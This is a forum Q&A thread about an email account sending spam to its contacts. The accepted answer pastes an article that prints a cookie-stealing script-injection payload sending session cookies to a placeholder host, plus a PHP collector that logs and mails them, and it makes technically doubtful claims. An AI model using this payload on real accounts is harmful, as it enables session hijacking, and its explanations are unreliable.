someone using my email to send spam?

Question

Someone is using my email address to send spam mail to everyone in my address book.  What do I do?

Richard · Accepted Answer

This happened to me recently. They are using a security hole in the client side of the browser which allows a hacker to rewrite a cookie accessing your email contacts via PHP embedded in the email and is currently undetectable by Yahoo Mail. The IP address from the originating email for my case came from this IP address 183.89.26.154 (this can be found in the full email header) which I tracked it down to Thailand. The link sent out to all my contacts accesses a website in Poland (a fake Canadian Pharmacy page) which will grab more emails based on the PHP Script similar to that below.

I have currently deleted all my cookies and cleared all my saved passwords in Firefox and have also installed Spybot Search and Destroy since my virus scanner (Eset Smart Security) and MS Malicious Software Removal Tool didn't find anything. After you do all the above, change your password and clear your cookies out frequently. Update: Also, DO NOT USE "KEEP ME SIGNED IN" check box by Yahoo/Hotmail when signing in, I believe this is "THE" problem based on the article I found below. Use Firefox browser's way to store the passwords since they are not cookie based and ALWAYS log out of any web based email to remove the current session cookie when finished. Here is a copy and paste of what I found and applies to both Yahoo mail and Hotmail.

How hackers steal yahoo passwords

This article is ment to provide more info on how to protect your yahoo account and every account in general and should not be used for stealing someone's info, password etc. It's purely informative. My yahoo Id was recently accessed by an unknown person which used it to send promotional emails to my list of friends who, of course, accessed them leaving the hacker another open door, and another and so on, the chain never ends. Hopefully yahoo wakes up. I did a search on this new thing that they use, it had to be something on the "client side", a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - it's easyer to attack than to deffend they say. It didn't take me too much to find this code which writes the recipient's cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easilly accessing the victim's yahoo email. The bug:

<STYLE onload="window.status='';

var x = escape(document.cookie).substr(0,1900);

b.innerHTML='<iframe src=http://your-site-here.com/script.php%E2%80%A6

id='+document.title.substring

(document.title.indexOf('-')+2)+'&cook…

frameborder=0 width=10 height=10></iframe>';" type=text/css>

</STYLE>

</DIV>

...which calls this php script:

$file="cookie.log";

if (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){

$logcookie = $_REQUEST["cookie"];

$logcookie = rawurldecode($logcookie);

$logemail = $_REQUEST["id"];

$logemail = rawurldecode($logemail);

if (file_exists($file)) {

$handle=fopen($file, "r+");

$filecontence=fread($handle,filesize("…

fclose($handle);

}

$handle=fopen($file, "w");

fwrite($handle, "$logemail - $logcookie\n$filecontence\n ");

//Writing email address and cookie then the rest of the log

fclose($handle);

mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n"…

}

header("Location: http://mail.yahoo.com");/

...which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly. NOTE: The code is a little changed to make it hard to use without PHP knowledge. How to protect yourself? My advice: DON'T EVER OPEN EMAILS FROM AN UNKNOWN SENDER.

...which calls this php script: $file="cookie.log"; if (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){ $logcookie = $_REQUEST["cookie"]; $logcookie = rawurldecode($logcookie); $logemail = $_REQUEST["id"]; $logemail = rawurldecode($logemail); if (file_exists($file)) { $handle=fopen($file, "r+"); $filecontence=fread($handle,filesize("… fclose($handle); } $handle=fopen($file, "w"); fwrite($handle, "$logemail - $logcookie\n$filecontence\n "); //Writing email address and cookie then the rest of the log fclose($handle); mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n"… } header("Location: http://mail.yahoo.com"); ...which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly. NOTE: The code is a little changed to make it hard to use without PHP knowledge. How to protect yourself? My advice: DON'T EVER OPEN EMAILS FROM AN UNKNOWN SENDER.

thankyoumaskedman · Answer

Most of the time they use phishing spam to trick you into delivering your password.  Change your password.  While you are doing that, check your alternate email contact address for tampering, which the spammer could have done after obtaining the password.  That can be used to obtain new passwords.  If there is an unfamiliar address there, change it.

Some spammers' websites can run malicious scripts which tell logged in webmail to send spam.  Abstain from clicking links within spam.

? · Answer

Email spoofing will always be possible, I'm afraid. Change your email address or password or 'live with it'. The best thing you can do is stop using the popular free email accounts that spammers know how to spoof, etc.

Anonymous · Answer

They just coped it and pretend it's theirs? That isn't right at all. Contact Yahoo about it.

Trending News

someone using my email to send spam?

4 Answers